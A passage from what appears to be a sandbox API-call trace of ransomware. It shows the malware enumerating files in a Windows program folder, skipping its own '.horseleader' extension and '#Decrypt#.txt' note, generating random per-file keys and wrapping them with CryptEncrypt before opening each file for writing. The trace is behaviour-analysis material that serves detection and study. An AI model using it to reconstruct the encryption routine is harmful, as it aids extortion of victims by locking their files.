[0251.917] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7272812d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7272812d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x10e94, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="Passport.wmv", cAlternateFileName="")) returned 1 [0251.917] lstrcmpiW (lpString1="Passport.wmv", lpString2="Windows") returned -1 [0251.918] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv") returned 67 [0251.918] StrStrIW (lpFirst="Passport.wmv", lpSrch=".horseleader") returned 0x0 [0251.918] lstrcmpW (lpString1="Passport.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.918] lstrcmpW (lpString1="Passport.wmv", lpString2="_uninstalling_.png") returned 1 [0251.918] lstrlenW (lpString=".testttjffg") returned 11 [0251.918] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", lpSrch=".testttjffg") returned 0x0 [0251.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.918] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x58bf8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passportcover.png", cAlternateFileName="")) returned 1 
[0251.918] lstrcmpiW (lpString1="passportcover.png", lpString2="Windows") returned -1 [0251.918] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png") returned 72 [0251.919] StrStrIW (lpFirst="passportcover.png", lpSrch=".horseleader") returned 0x0 [0251.919] lstrcmpW (lpString1="passportcover.png", lpString2="#Decrypt#.txt") returned 1 [0251.919] lstrcmpW (lpString1="passportcover.png", lpString2="_uninstalling_.png") returned 1 [0251.919] lstrlenW (lpString=".testttjffg") returned 11 [0251.919] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", lpSrch=".testttjffg") returned 0x0 [0251.919] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.919] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.925] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PassportMask.wmv", cAlternateFileName="")) returned 1 [0251.925] lstrcmpiW 
(lpString1="PassportMask.wmv", lpString2="Windows") returned -1 [0251.925] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv") returned 71 [0251.925] StrStrIW (lpFirst="PassportMask.wmv", lpSrch=".horseleader") returned 0x0 [0251.925] lstrcmpW (lpString1="PassportMask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.926] lstrcmpW (lpString1="PassportMask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.926] lstrlenW (lpString=".testttjffg") returned 11 [0251.926] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.926] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PassportMask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.926] lstrcmpiW 
(lpString1="PassportMask_PAL.wmv", lpString2="Windows") returned -1 [0251.926] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv") returned 75 [0251.926] StrStrIW (lpFirst="PassportMask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.927] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.927] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.928] lstrlenW (lpString=".testttjffg") returned 11 [0251.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.928] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.928] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727c06a1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727c06a1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12b9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport_mask_left.png", cAlternateFileName="")) returned 1 [0251.928] 
lstrcmpiW (lpString1="passport_mask_left.png", lpString2="Windows") returned -1 [0251.928] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png") returned 77 [0251.928] StrStrIW (lpFirst="passport_mask_left.png", lpSrch=".horseleader") returned 0x0 [0251.928] lstrcmpW (lpString1="passport_mask_left.png", lpString2="#Decrypt#.txt") returned 1 [0251.928] lstrcmpW (lpString1="passport_mask_left.png", lpString2="_uninstalling_.png") returned 1 [0251.928] lstrlenW (lpString=".testttjffg") returned 11 [0251.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", lpSrch=".testttjffg") returned 0x0 [0251.929] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.929] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cd, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport_mask_right.png", 
cAlternateFileName="")) returned 1 [0251.929] lstrcmpiW (lpString1="passport_mask_right.png", lpString2="Windows") returned -1 [0251.929] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png") returned 78 [0251.929] StrStrIW (lpFirst="passport_mask_right.png", lpSrch=".horseleader") returned 0x0 [0251.929] lstrcmpW (lpString1="passport_mask_right.png", lpString2="#Decrypt#.txt") returned 1 [0251.929] lstrcmpW (lpString1="passport_mask_right.png", lpString2="_uninstalling_.png") returned 1 [0251.929] lstrlenW (lpString=".testttjffg") returned 11 [0251.929] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", lpSrch=".testttjffg") returned 0x0 [0251.929] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.929] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.931] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7274e28a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7274e28a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1aaec, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="Passport_PAL.wmv", cAlternateFileName="")) returned 1 [0251.931] lstrcmpiW (lpString1="Passport_PAL.wmv", lpString2="Windows") returned -1 [0251.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 71 [0251.931] StrStrIW (lpFirst="Passport_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.931] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.931] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.931] lstrlenW (lpString=".testttjffg") returned 11 [0251.931] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.931] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.931] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72538f74, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72538f74, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18337, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="play-background.png", cAlternateFileName="")) returned 1 [0251.932] lstrcmpiW (lpString1="play-background.png", lpString2="Windows") returned -1 [0251.932] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png") returned 74 [0251.932] StrStrIW (lpFirst="play-background.png", lpSrch=".horseleader") returned 0x0 [0251.932] lstrcmpW (lpString1="play-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.932] lstrcmpW (lpString1="play-background.png", lpString2="_uninstalling_.png") returned 1 [0251.932] lstrlenW (lpString=".testttjffg") returned 11 [0251.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", lpSrch=".testttjffg") returned 0x0 [0251.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72512e17, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72512e17, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbf1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="selection_subpicture.png", cAlternateFileName="")) returned 1 [0251.933] lstrcmpiW (lpString1="selection_subpicture.png", lpString2="Windows") returned -1 [0251.933] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png") returned 79 [0251.933] StrStrIW (lpFirst="selection_subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.933] lstrcmpW (lpString1="selection_subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.933] lstrcmpW (lpString1="selection_subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.933] lstrlenW (lpString=".testttjffg") returned 11 [0251.933] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.933] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.933] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.934] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x658e, 
dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="travel.png", cAlternateFileName="")) returned 1 [0251.934] lstrcmpiW (lpString1="travel.png", lpString2="Windows") returned -1 [0251.934] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 65 [0251.934] StrStrIW (lpFirst="travel.png", lpSrch=".horseleader") returned 0x0 [0251.934] lstrcmpW (lpString1="travel.png", lpString2="#Decrypt#.txt") returned 1 [0251.934] lstrcmpW (lpString1="travel.png", lpString2="_uninstalling_.png") returned 1 [0251.934] lstrlenW (lpString=".testttjffg") returned 11 [0251.934] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", lpSrch=".testttjffg") returned 0x0 [0251.934] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.934] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.935] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7258522e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7258522e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x321a4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain.wmv", 
cAlternateFileName="")) returned 1 [0251.935] lstrcmpiW (lpString1="TravelIntroToMain.wmv", lpString2="Windows") returned -1 [0251.936] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 76 [0251.936] StrStrIW (lpFirst="TravelIntroToMain.wmv", lpSrch=".horseleader") returned 0x0 [0251.936] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.936] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="_uninstalling_.png") returned 1 [0251.936] lstrlenW (lpString=".testttjffg") returned 11 [0251.936] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", lpSrch=".testttjffg") returned 0x0 [0251.936] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.936] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.936] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725d14e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725d14e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="TravelIntroToMainMask.wmv", cAlternateFileName="")) returned 1 [0251.936] lstrcmpiW (lpString1="TravelIntroToMainMask.wmv", lpString2="Windows") returned -1 [0251.936] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv") returned 80 [0251.937] StrStrIW (lpFirst="TravelIntroToMainMask.wmv", lpSrch=".horseleader") returned 0x0 [0251.937] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.937] lstrcmpW (lpString1="TravelIntroToMainMask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.937] lstrlenW (lpString=".testttjffg") returned 11 [0251.937] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.937] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.937] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.937] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0xef24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMainMask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.937] lstrcmpiW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="Windows") returned -1 [0251.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 84 [0251.937] StrStrIW (lpFirst="TravelIntroToMainMask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.938] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.938] lstrcmpW (lpString1="TravelIntroToMainMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.938] lstrlenW (lpString=".testttjffg") returned 11 [0251.938] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", lpSrch=".testttjffg") 